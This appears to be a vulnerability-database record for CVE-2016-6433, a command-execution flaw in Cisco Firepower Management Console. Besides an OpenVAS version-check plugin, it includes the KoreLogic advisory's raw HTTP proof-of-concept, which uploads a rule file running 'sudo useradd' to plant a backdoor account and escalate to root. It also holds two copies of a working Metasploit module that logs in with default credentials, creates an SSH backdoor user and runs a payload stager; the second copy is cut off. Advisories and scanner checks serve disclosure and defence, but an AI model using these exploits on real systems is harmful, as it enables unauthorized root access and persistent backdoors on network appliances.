A vulnerability in Cisco Firepower Threat Management Console could allow an
authenticated, remote attacker to execute arbitrary commands on a targeted system.
{"id": "OPENVAS:1361412562310106333", "type": "openvas", "bulletinFamily": "scanner", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.", "published": "2016-10-06T00:00:00", "modified": "2020-04-03T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106333", "reporter": "Copyright (C) 2016 Greenbone Networks GmbH", "references": ["http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc"], "cvelist": ["CVE-2016-6433"], "lastseen": "2020-04-07T18:45:01", "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20161005-FTMC"]}, {"type": "cve", "idList": ["CVE-2016-6433"]}, {"type": "exploitdb", "idList": ["EDB-ID:40463"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:080F4291E285CF4785D54B4437C49803"]}, {"type": "korelogic", "idList": ["KL-001-2016-007"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138988", "PACKETSTORM:140467"]}, {"type": "pentestit", "idList": ["PENTESTIT:30AF1FB3AAE47288E800B5587788AF45"]}, {"type": "seebug", "idList": ["SSV:92711"]}, {"type": "zdt", "idList": ["1337DAY-ID-26656"]}]}, "score": {"value": 0.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cisco", "idList": ["CISCO-SA-20161005-FTMC"]}, {"type": "cve", "idList": ["CVE-2016-6433"]}, {"type": "exploitdb", "idList": ["EDB-ID:40463"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/CISCO_FIREPOWER_USERADD"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:138988"]}, {"type": "zdt", "idList": ["1337DAY-ID-26656"]}]}, "exploitation": null, "vulnersScore": 0.8}, "pluginID": "1361412562310106333", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:firepower_management_center\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106333\");\n script_cve_id(\"CVE-2016-6433\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_version(\"2020-04-03T09:54:35+0000\");\n\n script_name(\"Cisco Firepower Threat Management Console Remote Command Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"A vulnerability in Cisco Firepower Threat 
Management Console could allow an\n authenticated, remote attacker to execute arbitrary commands on a targeted system.\");\n\n script_tag(name:\"insight\", value:\"The vulnerability exists because parameters sent to the web application are\n not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user\n account on the server.\");\n\n script_tag(name:\"impact\", value:\"An attacker with user privileges on the web application may be able to\n leverage this vulnerability to gain access to the underlying operating system.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 09:54:35 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-06 10:54:17 +0700 (Thu, 06 Oct 2016)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_firepower_management_center_consolidation.nasl\");\n script_mandatory_keys(\"cisco/firepower_management_center/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! 
version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\naffected = make_list(\n '5.2.0',\n '5.3.0',\n '5.3.0.2',\n '5.3.0.3',\n '5.3.0.4',\n '5.3.1',\n '5.3.1.3',\n '5.3.1.4',\n '5.3.1.5',\n '5.3.1.6',\n '5.4.1.3',\n '5.4.1.5',\n '5.4.1.4',\n '5.4.1.2',\n '5.4.1.1',\n '5.4.1',\n '5.4.0',\n '5.4.0.2',\n '5.4.1.6',\n '6.0.1' );\n\nforeach af ( affected ) {\n if( version == af ) {\n report = report_fixed_ver( installed_version:version, fixed_version: \"See advisory\" );\n security_message( port:0, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "naslFamily": "CISCO", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659976447, "score": 1659977168}, "_internal": {"score_hash": "7faf94227423859a72be1257ae8687eb"}}
{"exploitpack": [{"lastseen": "2020-04-01T19:04:08", "description": "\nCisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T00:00:00", "title": "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T00:00:00", "id": "EXPLOITPACK:080F4291E285CF4785D54B4437C49803", "href": "", "sourceData": "KL-001-2016-007 : Cisco Firepower Threat Management Console Remote Command\nExecution Leading to Root Access\n\nTitle: Cisco Firepower Threat Management Console Remote Command Execution\nLeading to Root Access\nAdvisory ID: KL-001-2016-007\nPublication Date: 2016.10.05\nPublication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-007.txt\n\n\n1. 
Vulnerability Details\n\n Affected Vendor: Cisco\n Affected Product: Firepower Threat Management Console\n Affected Version: Cisco Fire Linux OS 6.0.1 (build 37/build 1213)\n Platform: Embedded Linux\n CWE Classification: CWE-434: Unrestricted Upload of File with Dangerous\n Type, CWE-94: Improper Control of Generation of Code\n Impact: Arbitrary Code Execution\n Attack vector: HTTP\n CVE-ID: CVE-2016-6433\n\n2. Vulnerability Description\n\n An authenticated user can run arbitrary system commands as\n the www user which leads to root.\n\n3. Technical Description\n\n A valid session and CSRF token is required. The webserver runs as\n a non-root user which is permitted to sudo commands as root with\n no password.\n\n POST /DetectionPolicy/rules/rulesimport.cgi?no_mojo=1 HTTP/1.1\n Host: 1.3.3.7\n User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:45.0)\nGecko/20100101 Firefox/45.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate, br\n DNT: 1\n Cookie: CGISESSID=4919a7838198009bba48f6233d0bd1c6\n Connection: close\n Content-Type: multipart/form-data;\nboundary=---------------------------15519792567789791301241925798\n Content-Length: 813\n\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"manual_update\"\n\n 1\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"source\"\n\n file\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"file\";\nfilename=\"Sourcefire_Rule_Update-2016-03-04-001-vrt.sh\"\n Content-Type: application/octet-stream\n\n sudo useradd -G ldapgroup -p `openssl passwd -1 korelogic` korelogic\n -----------------------------15519792567789791301241925798\n Content-Disposition: form-data; name=\"action_submit\"\n\n Import\n -----------------------------15519792567789791301241925798\n Content-Disposition: 
form-data; name=\"sf_action_id\"\n\n 8c6059ae8dbedc089877b16b7be2ae7f\n -----------------------------15519792567789791301241925798--\n\n\n HTTP/1.1 200 OK\n Date: Sat, 23 Apr 2016 13:38:01 GMT\n Server: Apache\n Vary: Accept-Encoding\n X-Frame-Options: SAMEORIGIN\n Content-Length: 49998\n Connection: close\n Content-Type: text/html; charset=utf-8\n\n ...\n\n $ ssh korelogic@1.3.3.7\n Password:\n\n Copyright 2004-2016, Cisco and/or its affiliates. All rights reserved.\n Cisco is a registered trademark of Cisco Systems, Inc.\n All other trademarks are property of their respective owners.\n\n Cisco Fire Linux OS v6.0.1 (build 37)\n Cisco Firepower Management Center for VMWare v6.0.1 (build 1213)\n\n Could not chdir to home directory /Volume/home/korelogic: No such file or\ndirectory\n korelogic@firepower:/$ sudo su -\n Password:\n root@firepower:~#\n\n4. Mitigation and Remediation Recommendation\n\n The vendor has acknowledged this vulnerability but has\n not issued a fix. Vendor acknowledgement available at:\n\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\n\n5. Credit\n\n This vulnerability was discovered by Matt Bergin (@thatguylevel) of\nKoreLogic, Inc.\n\n6. 
Disclosure Timeline\n\n 2016.06.30 - KoreLogic sends vulnerability report and PoC to Cisco.\n 2016.06.30 - Cisco acknowledges receipt of vulnerability report.\n 2016.07.20 - KoreLogic and Cisco discuss remediation timeline for\n this vulnerability and for 3 others reported in the\n same product.\n 2016.08.12 - 30 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.02 - 45 business days have elapsed since the vulnerability was\n reported to Cisco.\n 2016.09.09 - KoreLogic asks for an update on the status of the\n remediation efforts.\n 2016.09.15 - Cisco confirms remediation is underway and soon to be\n completed.\n 2016.09.28 - Cisco informs KoreLogic that the acknowledgement details\n will be released publicly on 2016.10.05.\n 2016.10.05 - Public disclosure.\n\n7. Proof of Concept\n\n See Technical Description\n\n\nThe contents of this advisory are copyright(c) 2016\nKoreLogic, Inc. and are licensed under a Creative Commons\nAttribution Share-Alike 4.0 (United States) License:\nhttp://creativecommons.org/licenses/by-sa/4.0/\n\nKoreLogic, Inc. is a founder-owned and operated company with a\nproven track record of providing security services to entities\nranging from Fortune 500 to small and mid-sized companies. We\nare a highly skilled team of senior security consultants doing\nby-hand security assessments for the most important networks in\nthe U.S. and around the world. 
We are also developers of various\ntools and resources aimed at helping the security community.\nhttps://www.korelogic.com/about-korelogic.html\n\nOur public vulnerability disclosure policy is available at:\nhttps://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2022-03-23T01:47:40", "description": "A vulnerability in Cisco Firepower Threat Management Console could allow an authenticated, remote attacker to execute arbitrary commands on a targeted system.\n\nThe vulnerability exists because parameters sent to the web application are not properly validated. This may lead an authenticated web user to run arbitrary system commands as the www user account on the server. An attacker with user privileges on the web application may be able to leverage this vulnerability to gain access to the underlying operating system.\n\nCisco has released software updates that address this vulnerability. Workarounds that address this vulnerability are not available. 
\n\nThis advisory is available at the following link: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc[\"http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc\"]", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-05T16:00:00", "type": "cisco", "title": "Cisco Firepower Threat Management Console Remote Command Execution Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6433"], "modified": "2016-10-05T16:00:00", "id": "CISCO-SA-20161005-FTMC", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161005-ftmc", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:01:21", "description": "No description provided by source.", "cvss3": {}, "published": "2017-02-24T00:00:00", "type": "seebug", "title": "Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (CVE-2016-6433)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-02-24T00:00:00", "href": 
"https://www.seebug.org/vuldb/ssvid-92711", "id": "SSV:92711", "sourceData": "\n ##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Remote::SSH\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Cisco Firepower Management Console.\r\n The management system contains a configuration flaw that allows the www user to\r\n execute the useradd binary, which can be abused to create backdoor accounts.\r\n Authentication is required to exploit this vulnerability.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Matt', # Original discovery & PoC\r\n 'sinn3r' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-6433' ],\r\n [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_X86,\r\n 'Targets' =>\r\n [\r\n [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Oct 10 2016',\r\n 'CmdStagerFlavor'=> %w{ echo },\r\n 'DefaultOptions' =>\r\n {\r\n 'SSL' => 'true',\r\n 'SSLVersion' => 'Auto',\r\n 'RPORT' => 443\r\n },\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n # admin:Admin123 is the default credential for 6.0.1\r\n OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),\r\n OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),\r\n OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: 
Random)']),\r\n OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),\r\n OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),\r\n OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # For this exploit to work, we need to check two services:\r\n # * HTTP - To create the backdoor account for SSH\r\n # * SSH - To execute our payload\r\n\r\n vprint_status('Checking Cisco Firepower Management console...')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')\r\n })\r\n\r\n if res && res.code == 200\r\n vprint_status(\"Console is found.\")\r\n vprint_status(\"Checking SSH service.\")\r\n begin\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n Net::SSH.start(rhost, 'admin',\r\n port: datastore['SSHPORT'],\r\n password: Rex::Text.rand_text_alpha(5),\r\n auth_methods: ['password'],\r\n non_interactive: true\r\n )\r\n end\r\n rescue Timeout::Error\r\n vprint_error('The SSH connection timed out.')\r\n return Exploit::CheckCode::Unknown\r\n rescue Net::SSH::AuthenticationFailed\r\n # Hey, it talked. 
So that means SSH is running.\r\n return Exploit::CheckCode::Appears\r\n rescue Net::SSH::Exception => e\r\n vprint_error(e.message)\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n def get_sf_action_id(sid)\r\n requirements = {}\r\n\r\n print_status('Attempting to obtain sf_action_id from rulesimport.cgi')\r\n\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\"\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')\r\n end\r\n\r\n sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]\r\n\r\n unless sf_action_id\r\n fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')\r\n end\r\n\r\n sf_action_id\r\n end\r\n\r\n def create_ssh_backdoor(sid, user, pass)\r\n uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')\r\n sf_action_id = get_sf_action_id(sid)\r\n sh_name = 'exploit.sh'\r\n\r\n print_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\")\r\n\r\n mime_data = Rex::MIME::Message.new\r\n mime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"')\r\n mime_data.add_part('file', nil, nil, 'form-data; name=\"source\"')\r\n mime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"')\r\n mime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"')\r\n mime_data.add_part(\r\n \"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\",\r\n 'application/octet-stream',\r\n nil,\r\n \"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\"\r\n )\r\n\r\n send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'cookie' => \"CGISESSID=#{sid}\",\r\n 'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\",\r\n 'data' => mime_data.to_s,\r\n 'vars_get' => { 'no_mojo' => '1' },\r\n })\r\n end\r\n\r\n def 
generate_new_username\r\n datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def generate_new_password\r\n datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)\r\n end\r\n\r\n def report_cred(opts)\r\n service_data = {\r\n address: rhost,\r\n port: rport,\r\n service_name: 'cisco',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: fullname,\r\n username: opts[:user],\r\n private_data: opts[:password],\r\n private_type: :password\r\n }.merge(service_data)\r\n\r\n login_data = {\r\n last_attempted_at: DateTime.now,\r\n core: create_credential(credential_data),\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL,\r\n proof: opts[:proof]\r\n }.merge(service_data)\r\n\r\n create_credential_login(login_data)\r\n end\r\n\r\n def do_login\r\n console_user = datastore['USERNAME']\r\n console_pass = datastore['PASSWORD']\r\n uri = normalize_uri(target_uri.path, 'login.cgi')\r\n\r\n print_status(\"Attempting to login in as #{console_user}:#{console_pass}\")\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'vars_post' => {\r\n 'username' => console_user,\r\n 'password' => console_pass,\r\n 'target' => ''\r\n }\r\n })\r\n\r\n unless res\r\n fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')\r\n end\r\n\r\n res_cookie = res.get_cookies\r\n if res.code == 302 && res_cookie.include?('CGISESSID')\r\n cgi_sid = res_cookie.scan(/CGISESSID=(\\w+);/).flatten.first\r\n print_status(\"CGI Session ID: #{cgi_sid}\")\r\n print_good(\"Authenticated as #{console_user}:#{console_pass}\")\r\n report_cred(username: console_user, password: console_pass)\r\n return cgi_sid\r\n end\r\n\r\n nil\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n @first_exec = true\r\n cmd.gsub!(/\\/tmp/, '/usr/tmp')\r\n\r\n # Weird hack for the cmd stager.\r\n # Because it keeps using > to write the payload.\r\n if @first_exec\r\n @first_exec = 
false\r\n else\r\n cmd.gsub!(/>>/, ' > ')\r\n end\r\n\r\n begin\r\n Timeout.timeout(3) do\r\n @ssh_socket.exec!(\"#{cmd}\\n\")\r\n vprint_status(\"Executing #{cmd}\")\r\n end\r\n rescue Timeout::Error\r\n fail_with(Failure::Unknown, 'SSH command timed out')\r\n rescue Net::SSH::ChannelOpenFailed\r\n print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')\r\n retry\r\n end\r\n end\r\n\r\n def init_ssh_session(user, pass)\r\n print_status(\"Attempting to log into SSH as #{user}:#{pass}\")\r\n\r\n factory = ssh_socket_factory\r\n opts = {\r\n auth_methods: ['password', 'keyboard-interactive'],\r\n port: datastore['SSHPORT'],\r\n use_agent: false,\r\n config: false,\r\n password: pass,\r\n proxy: factory,\r\n non_interactive: true\r\n }\r\n\r\n opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\r\n\r\n begin\r\n ssh = nil\r\n ::Timeout.timeout(datastore['SSH_TIMEOUT']) do\r\n @ssh_socket = Net::SSH.start(rhost, user, opts)\r\n end\r\n rescue Net::SSH::Exception => e\r\n fail_with(Failure::Unknown, e.message)\r\n end\r\n end\r\n\r\n def exploit\r\n # To exploit the useradd vuln, we need to login first.\r\n sid = do_login\r\n return unless sid\r\n\r\n # After login, we can call the useradd utility to create a backdoor user\r\n new_user = generate_new_username\r\n new_pass = generate_new_password\r\n create_ssh_backdoor(sid, new_user, new_pass)\r\n\r\n # Log into the SSH backdoor account\r\n init_ssh_session(new_user, new_pass)\r\n\r\n begin\r\n execute_cmdstager({:linemax => 500})\r\n ensure\r\n @ssh_socket.close\r\n end\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92711", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2017-01-12T02:03:22", "description": "", "cvss3": {}, "published": "2017-01-12T00:00:00", "type": "packetstorm", "title": "Cisco Firepower Management Console 6.0 Post Authentication UserAdd", 
"bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-6433"], "modified": "2017-01-12T00:00:00", "id": "PACKETSTORM:140467", "href": "https://packetstormsecurity.com/files/140467/Cisco-Firepower-Management-Console-6.0-Post-Authentication-UserAdd.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::SSH \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability found in Cisco Firepower Management Console. \nThe management system contains a configuration flaw that allows the www user to \nexecute the useradd binary, which can be abused to create backdoor accounts. \nAuthentication is required to exploit this vulnerability. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Matt', # Original discovery & PoC \n'sinn3r' # Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2016-6433' ], \n[ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] \n], \n'Platform' => 'linux', \n'Arch' => ARCH_X86, \n'Targets' => \n[ \n[ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Oct 10 2016', \n'CmdStagerFlavor'=> %w{ echo }, \n'DefaultOptions' => \n{ \n'SSL' => 'true', \n'SSLVersion' => 'Auto', \n'RPORT' => 443 \n}, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \n# admin:Admin123 is the default credential for 6.0.1 \nOptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), \nOptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), \nOptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), \nOptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), \nOptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), \nOptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\\'s SSH port', 22]) \n], self.class) \nend \n \ndef check \n# For this exploit to work, we need to check two services: \n# * HTTP - To create the backdoor account for SSH \n# * SSH - To execute our payload \n \nvprint_status('Checking Cisco Firepower Management console...') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') \n}) \n \nif res && res.code == 200 \nvprint_status(\"Console is found.\") \nvprint_status(\"Checking SSH service.\") \nbegin \n::Timeout.timeout(datastore['SSH_TIMEOUT']) do \nNet::SSH.start(rhost, 'admin', \nport: datastore['SSHPORT'], \npassword: Rex::Text.rand_text_alpha(5), \nauth_methods: ['password'], \nnon_interactive: true \n) \nend \nrescue Timeout::Error 
\nvprint_error('The SSH connection timed out.') \nreturn Exploit::CheckCode::Unknown \nrescue Net::SSH::AuthenticationFailed \n# Hey, it talked. So that means SSH is running. \nreturn Exploit::CheckCode::Appears \nrescue Net::SSH::Exception => e \nvprint_error(e.message) \nend \nend \n \nExploit::CheckCode::Safe \nend \n \ndef get_sf_action_id(sid) \nrequirements = {} \n \nprint_status('Attempting to obtain sf_action_id from rulesimport.cgi') \n \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\" \n}) \n \nunless res \nfail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') \nend \n \nsf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] \n \nunless sf_action_id \nfail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') \nend \n \nsf_action_id \nend \n \ndef create_ssh_backdoor(sid, user, pass) \nuri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') \nsf_action_id = get_sf_action_id(sid) \nsh_name = 'exploit.sh' \n \nprint_status(\"Attempting to create an SSH backdoor as #{user}:#{pass}\") \n \nmime_data = Rex::MIME::Message.new \nmime_data.add_part('Import', nil, nil, 'form-data; name=\"action_submit\"') \nmime_data.add_part('file', nil, nil, 'form-data; name=\"source\"') \nmime_data.add_part('1', nil, nil, 'form-data; name=\"manual_update\"') \nmime_data.add_part(sf_action_id, nil, nil, 'form-data; name=\"sf_action_id\"') \nmime_data.add_part( \n\"sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}\", \n'application/octet-stream', \nnil, \n\"form-data; name=\\\"file\\\"; filename=\\\"#{sh_name}\\\"\" \n) \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => uri, \n'cookie' => \"CGISESSID=#{sid}\", \n'ctype' => \"multipart/form-data; boundary=#{mime_data.bound}\", \n'data' => mime_data.to_s, \n'vars_get' => { 'no_mojo' 
